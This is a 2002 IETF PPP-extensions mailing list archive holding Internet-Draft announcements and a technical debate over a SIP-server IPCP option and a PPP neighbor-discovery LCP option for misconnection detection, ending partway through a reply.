From owner-ietf-ppp@merit.edu  Tue Jun  4 07:44:06 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA23521
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 07:44:06 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id C9BFE91226; Tue,  4 Jun 2002 07:44:12 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 8961391232; Tue,  4 Jun 2002 07:44:12 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 5EBA391226
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 07:44:11 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id CEA515DE5C; Tue,  4 Jun 2002 07:44:05 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from ietf.org (odin.ietf.org [132.151.1.176])
	by segue.merit.edu (Postfix) with ESMTP id 621165DE51
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 07:44:05 -0400 (EDT)
Received: from CNRI.Reston.VA.US (localhost [127.0.0.1])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA23431;
	Tue, 4 Jun 2002 07:43:43 -0400 (EDT)
Message-Id: <200206041143.HAA23431@ietf.org>
Mime-Version: 1.0
Content-Type: Multipart/Mixed; Boundary="NextPart"
To: IETF-Announce: ;
Cc: ietf-ppp@merit.edu
From: Internet-Drafts@ietf.org
Reply-To: Internet-Drafts@ietf.org
Subject: I-D ACTION:draft-sadler-pppext-disc-01.txt
Date: Tue, 04 Jun 2002 07:43:42 -0400
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

--NextPart

A New Internet-Draft is available from the on-line Internet-Drafts directories.


	Title		: Neighbor Discovery via PPP
	Author(s)	: J. Sadler, B. Mack-Crane
	Filename	: draft-sadler-pppext-disc-01.txt
	Pages		: 7
	Date		: 03-Jun-02
	
Work has been progressing in the Common Control and Measurement
Protocol (CCAMP) working group on the application of MPLS technology
to non-packet switching networks.  Development of the Generalized
MPLS (GMPLS) signaling draft [1] has allowed for Optical, SONET/SDH,
and spatial switching systems to be controlled using IP protocols.
In a GMPLS network, the path that a TDM connection will use is
developed using constraint based routing.  The developed route
utilizes TDM link state information announced via OSPF or IS-IS by
other nodes in the network.  However, a node cannot advertise the
existence of a link without first identifying the remote node
connected to the link and the capabilities of the neighboring node.
In a packet network, this function would typically be accomplished
using OSPF or IS-IS Hello messages repeated every 10 or so seconds.
However, the TDM link cannot transmit similar messages because the
port terminating the link cannot be shared between a TDM service
user and the OSPF/IS-IS termination function.

A URL for this Internet-Draft is:
http://www.ietf.org/internet-drafts/draft-sadler-pppext-disc-01.txt

To remove yourself from the IETF Announcement list, send a message to 
ietf-announce-request with the word unsubscribe in the body of the message.

Internet-Drafts are also available by anonymous FTP. Login with the username
"anonymous" and a password of your e-mail address. After logging in,
type "cd internet-drafts" and then
	"get draft-sadler-pppext-disc-01.txt".

A list of Internet-Drafts directories can be found in
http://www.ietf.org/shadow.html 
or ftp://ftp.ietf.org/ietf/1shadow-sites.txt


Internet-Drafts can also be obtained by e-mail.

Send a message to:
	mailserv@ietf.org.
In the body type:
	"FILE /internet-drafts/draft-sadler-pppext-disc-01.txt".
	
NOTE:	The mail server at ietf.org can return the document in
	MIME-encoded form by using the "mpack" utility.  To use this
	feature, insert the command "ENCODING mime" before the "FILE"
	command.  To decode the response(s), you will need "munpack" or
	a MIME-compliant mail reader.  Different MIME-compliant mail readers
	exhibit different behavior, especially when dealing with
	"multipart" MIME messages (i.e. documents which have been split
	up into multiple messages), so check your local documentation on
	how to manipulate these messages.
		
		
Below is the data which will enable a MIME compliant mail reader
implementation to automatically retrieve the ASCII version of the
Internet-Draft.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type: Message/External-body;
	access-type="mail-server";
	server="mailserv@ietf.org"

Content-Type: text/plain
Content-ID:	<20020603125420.I-D@ietf.org>

ENCODING mime
FILE /internet-drafts/draft-sadler-pppext-disc-01.txt

--OtherAccess
Content-Type: Message/External-body;
	name="draft-sadler-pppext-disc-01.txt";
	site="ftp.ietf.org";
	access-type="anon-ftp";
	directory="internet-drafts"

Content-Type: text/plain
Content-ID:	<20020603125420.I-D@ietf.org>

--OtherAccess--

--NextPart--




From owner-ietf-ppp@merit.edu  Tue Jun  4 07:44:38 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA23656
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 07:44:37 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id E54269123B; Tue,  4 Jun 2002 07:44:37 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 38B3991236; Tue,  4 Jun 2002 07:44:35 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id DD9CD9123B
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 07:44:31 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 6AA705DE5C; Tue,  4 Jun 2002 07:44:26 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from ietf.org (odin.ietf.org [132.151.1.176])
	by segue.merit.edu (Postfix) with ESMTP id EFAE75DE51
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 07:44:25 -0400 (EDT)
Received: from CNRI.Reston.VA.US (localhost [127.0.0.1])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA23509;
	Tue, 4 Jun 2002 07:44:04 -0400 (EDT)
Message-Id: <200206041144.HAA23509@ietf.org>
Mime-Version: 1.0
Content-Type: Multipart/Mixed; Boundary="NextPart"
To: IETF-Announce: ;
Cc: ietf-ppp@merit.edu
From: Internet-Drafts@ietf.org
Reply-To: Internet-Drafts@ietf.org
Subject: I-D ACTION:draft-song-pppext-sip-support-00.txt
Date: Tue, 04 Jun 2002 07:44:03 -0400
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

--NextPart

A New Internet-Draft is available from the on-line Internet-Drafts directories.


	Title		: SIP server IPCP configuration option for PPP
	Author(s)	: J. Song, D. Kim
	Filename	: draft-song-pppext-sip-support-00.txt
	Pages		: 6
	Date		: 03-Jun-02
	
The Point-to-Point Protocol (PPP) [1] provides a standard method for
transporting multi-protocol datagrams over point-to-point links.  
PPP defines an extensible Link Control Protocol (LCP) for 
establishing, configuring, and testing the data-link connection; and
a family of Network Control Protocols (NCPs) for establishing and 
configuring different network-layer protocols.
This document defines the PPP IPCP configuration option that contains
a list of IPv4 addresses that can be mapped to one or more SIP
proxy servers. It is just one of the many possible mechanism to 
locate the proxy server, such as DHCP option [6] and manual 
configuration. This approach is applicable to the system using PPP 
for the link layer protocol and IP address allocaiton (ex. 3GPP2 
Packet Data network)

A URL for this Internet-Draft is:
http://www.ietf.org/internet-drafts/draft-song-pppext-sip-support-00.txt

To remove yourself from the IETF Announcement list, send a message to 
ietf-announce-request with the word unsubscribe in the body of the message.

Internet-Drafts are also available by anonymous FTP. Login with the username
"anonymous" and a password of your e-mail address. After logging in,
type "cd internet-drafts" and then
	"get draft-song-pppext-sip-support-00.txt".

A list of Internet-Drafts directories can be found in
http://www.ietf.org/shadow.html 
or ftp://ftp.ietf.org/ietf/1shadow-sites.txt


Internet-Drafts can also be obtained by e-mail.

Send a message to:
	mailserv@ietf.org.
In the body type:
	"FILE /internet-drafts/draft-song-pppext-sip-support-00.txt".
	
NOTE:	The mail server at ietf.org can return the document in
	MIME-encoded form by using the "mpack" utility.  To use this
	feature, insert the command "ENCODING mime" before the "FILE"
	command.  To decode the response(s), you will need "munpack" or
	a MIME-compliant mail reader.  Different MIME-compliant mail readers
	exhibit different behavior, especially when dealing with
	"multipart" MIME messages (i.e. documents which have been split
	up into multiple messages), so check your local documentation on
	how to manipulate these messages.
		
		
Below is the data which will enable a MIME compliant mail reader
implementation to automatically retrieve the ASCII version of the
Internet-Draft.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type: Message/External-body;
	access-type="mail-server";
	server="mailserv@ietf.org"

Content-Type: text/plain
Content-ID:	<20020603130027.I-D@ietf.org>

ENCODING mime
FILE /internet-drafts/draft-song-pppext-sip-support-00.txt

--OtherAccess
Content-Type: Message/External-body;
	name="draft-song-pppext-sip-support-00.txt";
	site="ftp.ietf.org";
	access-type="anon-ftp";
	directory="internet-drafts"

Content-Type: text/plain
Content-ID:	<20020603130027.I-D@ietf.org>

--OtherAccess--

--NextPart--




From owner-ietf-ppp@merit.edu  Tue Jun  4 08:05:23 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA24526
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 08:05:23 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 9A82A91232; Tue,  4 Jun 2002 08:05:32 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 6441491233; Tue,  4 Jun 2002 08:05:32 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 7070691232
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 08:05:31 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id EED0B5DE51; Tue,  4 Jun 2002 08:05:25 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from nwkea-mail-1.sun.com (nwkea-mail-1.sun.com [192.18.42.13])
	by segue.merit.edu (Postfix) with ESMTP id A24FD5DD97
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 08:05:25 -0400 (EDT)
Received: from eastmail1.East.Sun.COM ([129.148.1.240])
	by nwkea-mail-1.sun.com (8.9.3+Sun/8.9.3) with ESMTP id FAA01956;
	Tue, 4 Jun 2002 05:05:31 -0700 (PDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail1.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id IAA23710;
	Tue, 4 Jun 2002 08:05:31 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g54C5R6V137222;
	Tue, 4 Jun 2002 08:05:27 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g54C5QPa137219;
	Tue, 4 Jun 2002 08:05:26 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15612.44294.12815.519624@gargle.gargle.HOWL>
Date: Tue, 4 Jun 2002 08:05:26 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: junhyuk@telecom.samsung.co.kr, daejoong@samsung.com
Cc: ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-song-pppext-sip-support-00.txt
In-Reply-To: Internet-Drafts@ietf.org's message of 4 June 2002 07:44:03
References: <200206041144.HAA23509@ietf.org>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

>   The SIP (Session Initiation Protocol) [3] is a signaling protocol 
>   used for the session invitation, modification and termination. 
>   The UAC (User Call Agent) sends a request to the callee UAC.  
>   However, the request message (INVITE) is not directly sent to the 
>   callee UAC, it rather go through proxy servers, and redirect
>   servers.  This draft is specifying one of the many possible mechanism
>   to locate the proxy server, such as DHCP option [6] and manual 
>   configuration.
[...]
>   Note : the format and behavior of these options are quoted from 
>   RFC1877 [2] for the sake of consistent implementation of PPP. 

Please do not do this.  DHCP works just fine over PPP, and it's the
appropriate mechanism for distributing application configuration
information such as SIP server addresses.  Negotiating this within
IPCP isn't the right thing to do because IPCP is part of the link
layer.  Would a SIP implementation expect to reach around IP to get
SIP server addresses from the Ethernet driver?  Or from a CLIP driver
on ATM?  Since it doesn't do that, why should it expect that same
configuration data from PPP?

In other words, with this proposal, you still need to have DHCP
distribution of these addresses on all L2 media other than PPP.  Thus,
it may as well be consistent on PPP rather than requiring a special
L2-specific mechanism.

RFC 1877 was a technical mistake and ought not be repeated.  If only
we could get rid of it ...

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Tue Jun  4 08:37:19 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA25775
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 08:37:19 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 21DD191216; Tue,  4 Jun 2002 08:37:27 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id E3D7491233; Tue,  4 Jun 2002 08:37:26 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id D393991216
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 08:37:25 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 51AB45DDB5; Tue,  4 Jun 2002 08:37:20 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from patan.sun.com (patan.Sun.COM [192.18.98.43])
	by segue.merit.edu (Postfix) with ESMTP id E46045DD97
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 08:37:19 -0400 (EDT)
Received: from eastmail2.East.Sun.COM ([129.148.1.241])
	by patan.sun.com (8.9.3+Sun/8.9.3) with ESMTP id GAA01247;
	Tue, 4 Jun 2002 06:38:36 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail2.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id IAA20829;
	Tue, 4 Jun 2002 08:37:25 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g54CbM6V137259;
	Tue, 4 Jun 2002 08:37:22 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g54CbLo8137256;
	Tue, 4 Jun 2002 08:37:21 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15612.46209.576274.803325@gargle.gargle.HOWL>
Date: Tue, 4 Jun 2002 08:37:21 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: Jonathan.Sadler@tellabs.com, Ben.Mack-Crane@tellabs.com
Cc: ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
In-Reply-To: Internet-Drafts@ietf.org's message of 4 June 2002 07:43:42
References: <200206041143.HAA23431@ietf.org>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

> 6.1.4 Misconnection failure modes
> 
>    Because successful LCP negotiation is dependent on a full-duplex
>    link existing between two neighboring nodes, a misconnection will
>    not allow LCP to complete successfully.  As a result, any support
>    for identifying a misconnection must be done via an LCP option.
>    Given that a misconnection may occur for any supported Interface,
>    the exchange of Interface Names provides the best information for
>    debugging a misconnection.

I'm failing to see the justification of a new LCP option here (or
6.1.3).  What the document seems to be saying above is also true of
any NCP that runs over PPP: one doesn't want to have a simple
misconfiguration result in a bad link being established.  That doesn't
mean that all NCPs should be negotiated in LCP.

If I understand this draft correctly, it proposes having LCP
negotiate, go to Opened state, and then somehow, at some point,
release the port so that some other non-PPP service ('TDM') can use
the port.  This raises several significant problems: the document does
not describe exactly when and how this hand-off occurs, it does not
describe what happens if the peer attempts to restart LCP (unless
physical end-to-end signaling is always required, and that's not a
requirement of PPP), and it does not describe how this feature
interacts with the existing suite of PPP features (e.g.,
Authentication, CHAP rechallenge, LQM, MP, CCP, ECP, and basic LCP
Echo-Request/Response).

An alternative -- one that would require no changes to PPP at all --
would be an agreement by the peers to use PAP or EAP to exchange
identities, and to place the link identity in the "peer name" field.
Since this proposal is an identification mechanism, it seems logical
to use the existing identification mechanisms to support it.

However, this proposal also appears to be using PPP as though it were
a one-shot exchange, which is not the case.  This is troubling in
terms of the feature support outlined above.  It seems to me that a
new protocol -- say, "one time identity exchange protocol" -- would be
preferable to redefinition of all of the PPP subprotocols to fit in
this context.

There are other issues with the draft (e.g., the session ID doesn't
appear to be necessary, since the peers themselves already know over
which port they're communicating -- there can be only one session on
any given peer-to-peer connection), but I think those can wait until
the fundamental questions are addressed.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Tue Jun  4 10:10:44 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA29493
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 10:10:44 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 445339122F; Tue,  4 Jun 2002 10:10:56 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 1448791233; Tue,  4 Jun 2002 10:10:55 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 36B4A9122F
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 10:10:55 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id B9B345DE7B; Tue,  4 Jun 2002 10:10:49 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from internaut.com (unknown [64.38.134.99])
	by segue.merit.edu (Postfix) with ESMTP id 21B7B5DD94
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 10:10:45 -0400 (EDT)
Received: from localhost (aboba@localhost)
	by internaut.com (8.10.2/8.10.2) with ESMTP id g54DLRL18681;
	Tue, 4 Jun 2002 06:21:27 -0700
Date: Tue, 4 Jun 2002 06:21:27 -0700 (PDT)
From: Bernard Aboba <aboba@internaut.com>
To: James Carlson <james.d.carlson@east.sun.com>
Cc: Jonathan.Sadler@tellabs.com, Ben.Mack-Crane@tellabs.com,
        ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
In-Reply-To: <15612.46209.576274.803325@gargle.gargle.HOWL>
Message-ID: <Pine.LNX.4.21.0206040620090.17478-100000@internaut.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

> An alternative -- one that would require no changes to PPP at all --
> would be an agreement by the peers to use PAP or EAP to exchange
> identities, and to place the link identity in the "peer name" field.
> Since this proposal is an identification mechanism, it seems logical
> to use the existing identification mechanisms to support it.

I think that this would work fine. In particular, there is nothing in RFC
2284 that prohibits sending an EAP-Request/Identity, receiving an
EAP-Response/Identity, and then sending an EAP-Success to end the
exchange.



From owner-ietf-ppp@merit.edu  Tue Jun  4 10:27:57 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA00248
	for <pppext-archive@lists.ietf.org>; Tue, 4 Jun 2002 10:27:56 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 53EA991234; Tue,  4 Jun 2002 10:28:09 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 23CFA91235; Tue,  4 Jun 2002 10:28:09 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 1FB6E91234
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 10:28:08 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 87B135DE9C; Tue,  4 Jun 2002 10:28:02 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from pheriche.sun.com (pheriche.sun.com [192.18.98.34])
	by segue.merit.edu (Postfix) with ESMTP id 208A45DDD8
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 10:28:02 -0400 (EDT)
Received: from eastmail2.East.Sun.COM ([129.148.1.241])
	by pheriche.sun.com (8.9.3+Sun/8.9.3) with ESMTP id IAA09650;
	Tue, 4 Jun 2002 08:28:05 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail2.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id KAA14666;
	Tue, 4 Jun 2002 10:28:03 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g54ES06V137637;
	Tue, 4 Jun 2002 10:28:00 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g54ERxSm137634;
	Tue, 4 Jun 2002 10:27:59 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15612.52847.604995.495613@gargle.gargle.HOWL>
Date: Tue, 4 Jun 2002 10:27:59 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: Bernard Aboba <aboba@internaut.com>
Cc: Jonathan.Sadler@tellabs.com, Ben.Mack-Crane@tellabs.com,
        ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
In-Reply-To: Bernard Aboba's message of 4 June 2002 06:21:27
References: <15612.46209.576274.803325@gargle.gargle.HOWL>
	<Pine.LNX.4.21.0206040620090.17478-100000@internaut.com>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Bernard Aboba writes:
> > An alternative -- one that would require no changes to PPP at all --
> > would be an agreement by the peers to use PAP or EAP to exchange
> > identities, and to place the link identity in the "peer name" field.
> > Since this proposal is an identification mechanism, it seems logical
> > to use the existing identification mechanisms to support it.
> 
> I think that this would work fine. In particular, there is nothing in RFC
> 2284 that prohibits sending an EAP-Request/Identity, receiving an
> EAP-Response/Identity, and then sending an EAP-Success to end the
> exchange.

Nor is there anything that actually says what (if any) internal
structure might exist in the "Identity" value.  It's all based on
prior agreement between the peers.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Tue Jun  4 14:35:14 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA09976
	for <pppext-archive@odin.ietf.org>; Tue, 4 Jun 2002 14:35:14 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 27F699120A; Tue,  4 Jun 2002 14:35:25 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id E7E1B9122D; Tue,  4 Jun 2002 14:35:24 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id E5DF89120A
	for <ietf-ppp@trapdoor.merit.edu>; Tue,  4 Jun 2002 14:35:23 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 7665B5DEC2; Tue,  4 Jun 2002 14:35:18 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from mx3.tellabs.com (mx3.tellabs.com [204.68.180.53])
	by segue.merit.edu (Postfix) with ESMTP id EDED15DE82
	for <ietf-ppp@merit.edu>; Tue,  4 Jun 2002 14:35:16 -0400 (EDT)
Received: from mailw02.hq.tellabs.com (mailw02.lisle.tellabs.com [172.23.207.12])
	by mx3.tellabs.com (Mirapoint)
	with ESMTP id AFW65772;
	Tue, 4 Jun 2002 13:35:23 -0500 (CDT)
Received: from tellabs.com (dhcp-172-23-111-24.lisle.tellabs.com [172.23.111.24]) by mailw02.hq.tellabs.com with ESMTP (8.8.6 (PHNE_17190)/8.7.1) id NAA23662; Tue, 4 Jun 2002 13:35:24 -0500 (CDT)
Message-ID: <3CFD086B.C7A17360@tellabs.com>
Date: Tue, 04 Jun 2002 13:35:23 -0500
From: Jonathan Sadler <jonathan.sadler@tellabs.com>
Reply-To: jonathan.sadler@tellabs.com
X-Mailer: Mozilla 4.75 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: James Carlson <james.d.carlson@east.sun.com>
Cc: Ben.Mack-Crane@tellabs.com, ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
References: <H0000c0804978bf6.1023201667.mailw02@MHS>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

James -

James Carlson wrote:
> 
> > 6.1.4 Misconnection failure modes
> >
> >    Because successful LCP negotiation is dependent on a full-duplex
> >    link existing between two neighboring nodes, a misconnection will
> >    not allow LCP to complete successfully.  As a result, any support
> >    for identifying a misconnection must be done via an LCP option.
> >    Given that a misconnection may occur for any supported Interface,
> >    the exchange of Interface Names provides the best information for
> >    debugging a misconnection.
> 
> I'm failing to see the justification of a new LCP option here (or
> 6.1.3).

Misconnection detection identifies the fact that an RX/TX pair has not
been correctly terminated on a corresponding RX/TX pair on the remote
end.

While full-duplex electrical serial interfaces typically have the RX and
TX signals on the same connector (eg. RS-232 on a DB-25 or DB-9,
Ethernet on a DB15 or RJ45), fiber-optics serial interfaces typically do
not (eg. OC-n on ST or SC).  As the draft points out, it is possible for
the following misconnection scenarios to exist:
   - Transmit/Receive reversal
   - Transmit/Receive half-connection
   - Transmit/Receive split 1 port -> 2 ports (1 NE -> 1 NE)
   - Transmit/Receive split 2 ports -> 2 ports (1 NE -> 1 NE)
   - Transmit/Receive split 1 NE -> 2 NEs

This is not the same as misconfiguration of a PPP option.

> What the document seems to be saying above is also true of
> any NCP that runs over PPP: one doesn't want to have a simple
> misconfiguration result in a bad link being established.

Your statement has the following two corollaries:
  - LCP is the only place that Misconnection detection can
    be accomplished as LCP cannot successfully negotiate if
    there is a Misconnection.  If LCP cannot successfully
    negotiate then no NCP will be started, thereby making
    it impossible for an NCP to identify a misconnection.

  - The fact that LCP will not negotiate to the OPEN state on a
    link because of a Misconnection (not misconfiguration) is good.

I agree with both of these ideas.  We are not looking to change the
behavior of LCP with respect to negotiating into the OPEN state.

Instead, we are looking to provide an aid to the technition that is
trying to figure out how things are misconnected.  Finding a
misconnection may seem simple when the number of terminations to choose
between is less than 10.  However, modern Digital Cross Connect systems
are located in offices with fiber patch frames containing hundreds to
thousands of terminations.

Consequently, knowing the ID of the port that a span has connected to
will provide significant help in figuring out where the misconnection
is.

> That doesn't
> mean that all NCPs should be negotiated in LCP.

Agreed.  However, we are not looking to create an NCP.  This is
specifically to identify a property of a link (specifically, the
identity of the neighboring equipment) that is independent of the
Network Layer protocols used above it.  The Address being passed is just
a "cookie" -- it has no meaning with respect to the USE of the bearer.

> If I understand this draft correctly, it proposes having LCP
> negotiate, go to Opened state, and then somehow, at some point,
> release the port so that some other non-PPP service ('TDM') can use
> the port.

For ports that don't support an NCP, this is correct.  The "somehow, at
some point" is immediately after sucessful LCP negotiation.  The release
is accomplished using the existing "Send-Termination-Request" message so
it is not redefining the operation of the LCP state machine.

If a port does support an NCP, then the port would continue to negotiate
MLPPP, Authentication, and the NCP just like PPP does today.

> This raises several significant problems: the document does
